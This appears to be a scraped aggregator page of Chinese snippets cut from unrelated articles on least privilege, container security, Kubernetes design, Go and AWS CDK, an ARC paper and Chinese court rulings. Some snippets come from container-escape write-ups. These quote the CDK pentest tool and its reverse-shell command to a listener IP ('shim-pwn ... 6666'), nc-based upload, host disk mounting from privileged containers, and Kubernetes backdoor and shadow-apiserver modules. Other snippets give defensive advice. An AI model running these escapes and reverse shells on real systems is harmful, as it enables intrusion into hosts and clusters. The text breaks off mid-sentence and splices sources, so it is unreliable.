之前的项目中的一些事情的做法违背了最小特权原则(亦为最小权限原则),这里记录以下什么是该原则。 原始定义 该原则最早由Jerome Saltzer提出。...其中文意思为 系统的每个程序或者用户应该使用完成工作所需的最小权限工作。 带来的好处 更好的系统稳定性。 当一段程序被限定了最小权限原则,就可以更加容易地测试可能的行为以及与其他程序的交互。...比如,一个被赋予最小特权的程序没有权限让机器设备崩溃,也不会阻碍同一系统上的其他程序运行。 更好的系统安全性。...间谍软件和病毒无法检测“系统级的损坏。...延伸阅读 最小权限原则 Principle of least privilege
项目名称:CDK 项目作者:CDK-Team 项目地址: https://github.com/cdk-team/CDK/ CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及...docker-sock-deploy ✔ link 容器逃逸 挂载逃逸(特权容器) mount-disk ✔ link 容器逃逸 Cgroup逃逸(特权容器) mount-cgroup ✔ link...lxcfs-rw ✔ link 容器逃逸 重写Cgroup以访问设备 rewrite-cgroup-devices ✔ link 网络探测 K8s组件探测 service-probe ✔ link 信息收集 检查和获取...WebShell webshell-deploy ✔ link 持久化 部署后门Pod k8s-backdoor-daemonset ✔ link 持久化 部署影子K8s api-server k8s-shadow-apiserver...部署K8s shadow apiserver 向K8s集群中部署一个shadow apiserver,该apiserver具有和集群中现存的apiserver一致的功能,同时开启了全部K8s管理权限
是Linux一种安全机制,在linux内核2.2之后引入,用于对权限更细致的控制 而容器社区一直在努力将纵深防护,最小权限等理念和原则落地 单容器环境内的信息收集 当我们拿到了一个shell,首先要判断的是当前环境是否为容器环境...privileged 特权容器的权限其实有很多,所以也有很多不同的逃逸方式,挂载设备读写宿主机文件是特权容器最常见的逃逸方式之一 如何判断当前容器是以Privileged 特权模式启动的呢?...或者是 0000001fffffffff 特权模式下: 非特权模式下: 那么重点来了,如何逃逸?...https://github.com/cdk-team/CDK/wiki/CDK-Home-CN 如何将CDK上传到容器内部?...] >cdk #反弹宿主机shell chmod a+X cdk .
是Linux一种安全机制,在linux内核2.2之后引入,用于对权限更细致的控制而容器社区一直在努力将纵深防护,最小权限等理念和原则落地单容器环境内的信息收集当我们拿到了一个shell,首先要判断的是当前环境是否为容器环境查询...特权模式下:非特权模式下:那么重点来了,如何逃逸?.../CDK/wiki/CDK-Home-CN如何将CDK上传到容器内部?...1.webshell下直接上传2.非webshell下的出网环境#vps上面开启ncnc -lvp 999 cdk#容器内写入cat cdk...#反弹宿主机shellchmod a+X cdk.
在实际项目也经常发现厂商部署了使用k8s进行管理的云原生架构环境,在目前全面上云的趋势,有必要学习在k8s环境的下的一些攻击手法,本文非常适合刚入门或者准备学习云安全方向的安全人员,每个步骤都是亲手复现整理...OS: CentOS 7.9 kubernetes:v1.23 Ansible自动化部署K8S集群 或其他安装方法 一个集群包含三个节点,其中包括一个控制节点和两个工作节点 主机名 角色 IP 安装软件...采用CDK攻击 CDK(Container DucK)是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。...项目地址:https://github.com/cdk-team/CDK/ # 利用cdk工具通过"system:anonymous"匿名账号尝试登录 ....如果挂载到集群内的token具有创建pod的权限,可以通过token访问集群的api创建特权容器,然后通过特权容器逃逸到宿主机,从而拥有集群节点的权限 [root@hacker ~]# kubectl
即便我们现在有了伟大云产品来部署应用,但著名的分布式计算谬误 依然存在。的确,网络会造成延迟和错误。云原生应用通常是微服务,必须进行专门的设计和部署,以克服这些挑战。...通过有意识地设计软件来利用这些特性,并且按照相同的方式部署软件,我们就能创建出真正以云原生方式扩展的软件。 在本文中,我将会展示在 Kubernetes 上设计和部署云原生应用的 15 条原则。...2 在 Kubernetes 上设计和部署可扩展应用的原则 Kubernetes 使得部署和运维应用变得更容易。...原则 13:选择蓝 / 绿或金丝雀部署,而不是全停机方式的部署 在现在这个时代,为了进行维护,而将整个应用关闭是难以让人接受的。...如果应用确实需要提升权限,我们依然要使用非 root 用户,为其移除所有的 Linux 功能,然后将最小的功能集添加回来。
Containerd 可以在宿主机中管理完整的容器生命周期:容器镜像的传输和存储、容器的执行和管理、存储和网络等。...这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。...下载poc https://github.com/Xyntax/CDK/releases/tag/0.1.6 将与内核类型对应的poc复制到虚拟机的容器中 ?...docker cp cdk_linux_386 容器ID:/tmp ? docker ps查看当前运行的镜像: ? 进入镜像,poc已复制到镜像中: ?.../cdk_linux_386 run shim-pwn 192.168.254.132 6666 ? ? 反弹成功 0x06 修复方式 升级 containerd 至最新版本。
查看当前设备的所有分区内容和操作分区:fdisk -l(如果是非特权模式无法使用,可以通过df -h 获取磁盘信息)将/dev/sda1挂载至新建的文件夹,这时候我们已经可以获取到宿主机的所有文件夹,可以任意读取修改宿主机的文件...cat /proc/net/unix|grep -a "containerd-shim"3、漏洞利用以--net=host 启动容器直接下载exp并解压https://github.com/Xyntax/CDK.../releases/download/0.1.6/cdk_v0.1.6_release.tar.gz在kali中开启监听,并执行exp。...成功接受到shellPart04 如何防止docker逃逸1、避免使用特权模式启动容器,或者限制容器所需的最小权限;2、避免将宿主机上的敏感文件或目录挂载到容器内部,或者使用只读模式挂载;3、避免将Docker...Socket文件挂载到容器内部,或者使用TLS加密通信;4、及时更新Docker和相关组件的版本,修复已知的漏洞;5、使用安全扫描工具检测和分析容器镜像和运行时环境;6、使用安全策略和监控工具管理和保护容器生命周期
我们期待着与早期采用者紧密合作,扩大Go CDK用户和贡献者社区。 可移植APIs 我们的第一项计划是一套常用云服务的可移植API。...然后,你可以在任何支持的云上运行你的应用程序,只需进行最小配置更改。 我们当前的API集包括: blob,用于持久化blob数据。...反馈 我们希望您和我们一样对Go CDK感到兴奋 - 查看我们的godoc,走一遍我们的教程,并在您的应用程序中使用Go CDK。我们很乐意听到您对其他API和API提供商的想法。...今天,我们一起探索了Go Cloud Development Kit的新功能和其给云开发带来的便利。通过提供可移植的APIs,Go CDK让跨云部署和管理变得更加简单。...功能 描述 可移植APIs 支持多云部署的通用API blob 支持多种云存储的blob数据持久化 pubsub 为不同的消息队列服务提供统一的发布/订阅接口 runtimevar 观察和管理外部配置变量
合理使用cgroups可帮助防止DoS攻击和资源耗尽情况。 安全模式和实践 在开发、部署和操作容器时实施最佳实践和特定的安全模式对于维护安全环境至关重要。...最小特权:容器应以最小特权运行,只授予应用程序所需的最小权限。 不可变基础设施:容器应被视为不可变单元——一旦构建,就不应该被更改。任何更改都应通过从更新后的镜像部署新容器来进行。...这是容器安全的关键方面,因为威胁可能在容器部署后到达或被发现。适当的运行时安全措施有助于最小化如果漏洞被利用可能造成的损害。...最小特权原则 确保您的容器遵循最小特权原则,这意味着它们应该只具有执行其预期功能所需的最小权限。这可以帮助限制容器被攻击时可能造成的潜在损害。 尽可能以非根用户身份运行容器。...通过专注于运行时安全,您可以确保在容器部署到您的环境后,它们仍然是安全的。旨在最小化潜在的攻击面,并持续监控威胁,以帮助保护关键应用程序和数据。
在本文中,我将介绍如何设计云原生应用程序并将其部署在 Kubernetes 上的 15 条原则。...15 条原则 从不使用单 Pod 有状态与无状态区别 秘密与非秘密 自动缩放 生命周期管理 探针 快速失败 可观测性 资源请求与限制 预留资源和优先级 调度要求 Pod SLO 不停机部署 权限限制 攻击面限制...原则 2:明确区分有状态和无状态组件 Kubernetes 定义了许多不同的资源和管理它们的控制器。每个都有自己的语义。...原则 13:选择蓝/绿或金丝雀部署而不是停机部署 在这个时代,为了升级维护而关闭整个应用程序是不可接受的。这现在被称为“stop-the-world 部署”,其中应用程序暂时无法访问。...通过更复杂的部署策略,可以实现更平滑和更渐进的变化。最终用户根本不需要知道应用程序已更改。 蓝/绿 和 金丝雀 部署曾经是一门黑色艺术,但 Kubernetes 让所有人都可以更廉价的使用它。
ARC Challenge based on Descriptive Grid Models and the Minimum Description Length Principle 基于描述性网格模型和最小描述长度原则的...然后,我们通过选择“最佳读取”来定义输入网格和输出网格的绝对描述长度,即最小化两个网格累计DL的链式读取。...构造器的每个字段和函数的每个参数都是模板,因此原则上允许任意混合值、构造器、函数和未知数。在版本2中,我们从不为网格、对象、形状和函数参数使用未知数。...初始模型由两个最小的网格模型组成,简化为背景,具有未知的大小和颜色,没有形状层。...即使模型中没有计数和多数的概念,MDL原则隐式地识别了最能压缩的主要颜色。 对于11个训练任务,该方法在所有训练实例上都成功了,尽管它在测试实例上失败了。
它允许大量的特权操作,包括mount文件系统,交换空间,还有对各种设备的操作以及系统调试相关的调用。...debugfs界面上传的文件 也可以使用CDK来进行漏洞利用,但是需要目标是XFS文件系统。...使用CDK执行如下命令进行利用 #执行rewrite-cgroup-devices逃逸 ..../cdk run rewrite-cgroup-devices debugfs -w cdk_mknod_result #执行?可以看到有哪些命令 可以执行cat ls等命令。...需要注意的是,读取和查看的目录或文件都需要是绝对路径。 但是echo命令不存在,无法通过echo命令写入公钥,也无法写入计划任务反弹shell。
AWS CDK 创建和管理云资源的简单和便捷。...到这里代码就写好了,只有几十行代码,下面我们就是检查和部署了。...部署 在检查无误后就可以开始部署了,执行命令 cdk deploy 并输入 y 确认,之后可以看到部署的进度条。...如果部署中间出现错误, CDK 会自动进行回滚,之前创建和修改的资源都会被恢复原样,可以放心使用。 ?...结语 非常感谢来自 AWS 的 @pahud[1] 同学的指导和帮助,总体来说 Python 版本的 CDK 使用起来比较方便,但文档和源码中的说明略有不足。
目前比较受欢迎的还有一种方式,就是采用常规编程语言通过代码来生成声明式的配置,然后再基于声明式的配置进行部署,这样既不会重复造轮子,同时常规编程语言的可读性、代码量以及编写的难易程度都比直接编写 Yaml...原理 AWS CDK 将 Imperative 和 Declarative 进行了结合,通过编程语言生成 CloudFormation 的 template,之后再由 CloudFormation 生成对应的...CLI Command AWS CDK 还提供了一些命令来帮助开发者完成代码构建、资源检查和部署等功能。...diff cdk diff 是最常用的一个命令了,会帮助用户检查当前 Stack 和 云上资源的不同,并作出标记: $ cdk diff Stack HelloCdkStack IAM Statement...deploy 在检查无误后,就可以进行部署了,使用 cdk deploy 命令,就会开始部署 CloudFormation,可以看到实时进度,如果遇到问题,也会进行回滚。
自从身份验证和授权成为访问计算机系统的常规操作,最小权限原则(POLP)就是实际上的安全底线。其核心思想在于仅为用户分配供其完成任务所需访问公司数据及系统的最小权限——不多也不少,恰恰够完成工作。...理论上,遵守POLP似乎是最佳身份与访问管理策略,但实现最小权限往往说得容易做起来难。 ? 为什么最小权限原则一直难以实现? 原因很多。...管理员权限应用最小权限原则的经典案例是Unix和Linux系统上的开源工具“sudo”(“ superuser do ”的缩写)。...随着日常Unix/Linux和AD/AAD管理员访问以最小权限模式委托出去,我们很有必要在其他特权口令的核发、批准和管理上实现安全和自动化。...特权行为分析有助于检测异常及危险行为,身份分析则可评估特权口令管理器和最小权限模式中与管理员权限相关的那些权利。对同类管理员进行权利与权限分析,可以帮助公司发现其最小权限模式中的弱点。
通过 RBAC 强制最小权限原则 RBAC 遵循最小权限原则,这意味着角色和高权限组应限制分配和使用。...这带来了两个好处:首先,为特权访问增加了保护层,其次,为所有特权活动提供了更清晰的审计跟踪。 跑:仅将特权访问限制为紧急情况:这与 GitOps 部署和管理系统特别匹配(请参见下一项)。...使用 GitOps 部署和管理集群 GitOps 通过 Git 中的代码即配置 (CaC) 管理所有集群更改,从而消除了手动集群修改。此方法符合最小权限原则,并提供了超出安全性的好处。...这很容易实现,但需要为您的持续集成和部署 ( CI/CD ) 系统在您的集群中至少提供一个相当特权的帐户(可能更多,具体取决于您的 CaC 是如何组织的)。 走:使用 GitOps 运营商。...第一步是了解您在特权模式下运行的内容。然后,您可以开始从不需要它的工作负载中删除权限。 走:使用准入控制器规则开始对特权容器实施限制,以防止在特权模式下运行的容器运行。
因此,对于应用程序的任何一个给定组件,这是部署过程的大致模板: 图 1:最小化的部署模板 蜂窝架构的目标之一是最小化故障的爆炸半径,而故障最有可能发生的一个时间点是在部署之后。...下面是这类工具的一些示例: AWS CDK(云开发工具包)——用于部署 CloudFormation 基础设施; AWS cdk8s——用于部署 Kubernetes 基础设施; CDKTF(Terraform...的 CDK)——用于通过 HashiCorp Terraform 部署基础设施。...AWS CDK 和 AWS CodePipeline 的组合功能非常强大,我们可以使用通用模式为每个应用程序组件定义管道,并在共享大部分代码的同时为每个组件设置必要的构建和部署步骤。...对于入站权限,我们可以循环遍历注册表中所有开发人员和单元账户,并使用 CDK 授予适当的角色。在向单元注册表添加新账户时,自动化机制会自动设置正确的权限。
有关法院在裁判过程中,结合对互联网竞争特点的分析,以及对《反不正当竞争法》一般条款的理解,形成了针对安全软件的三大规则:“非公益必要不干扰原则”、“最小特权原则”和“公平竞争原则”。 ...二、“最小特权原则” “最小特权原则”在百度诉360插标及劫持流量案再审裁定中得以确定(参见:民事裁定书(2014)民申字第873号)。...”中(参见:民事判决书(2011)粤高法民三初字第1号;(2013)民三终字第5号),360针对QQ软件专门开发了“扣扣保镖”,阻止QQ的正常加载,屏蔽正常功能,清理正常文件,过滤信息窗口等,亦有违“最小特权原则...,将安全软件的特权限定在维护网络安全的“必要”范围内,即最小特权;第三,拥有特权的互联网经营者不得滥用其技术特权,干预其他软件的运行。 ...对于此原则,中国人民大学副教授孟雁北同时认为,360的相关行为,是否违背“最小特权原则”,需要互联网行业专家进行技术和专业上的判断;同时,还需要对“最小特权原则”是否属于互联网行业公认的商业道德进行判断
K8s 有丰富的配置选项,但默认值通常并不安全 根据 DevOps 原则,Kubernetes 旨在加快应用程序部署并简化管理和操作,同时提供了丰富的控件集,用于有效保护集群及其应用程序的安全。...——哪些集群、命名空间和节点 部署方式——是否以特权方式运行,可以与其他哪些部署进行通信 可以访问的内容——包括 secret、卷和其他基础结构组件,例如主机或 orchestrator API 是否符合要求...10)防止过度访问 secret 信息 确保部署时仅安装其实际需要的 secret,以防止不必要的信息泄露。 11)评估容器使用的特权 赋予容器的功能、角色绑定和权限集会极大影响安全风险。...我们最好遵守最小特权原则,只提供容器执行其预期功能的最小特权和功能。...DevOps 实践和云原生原则的需求。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
腾讯会议
云直播
对象存储
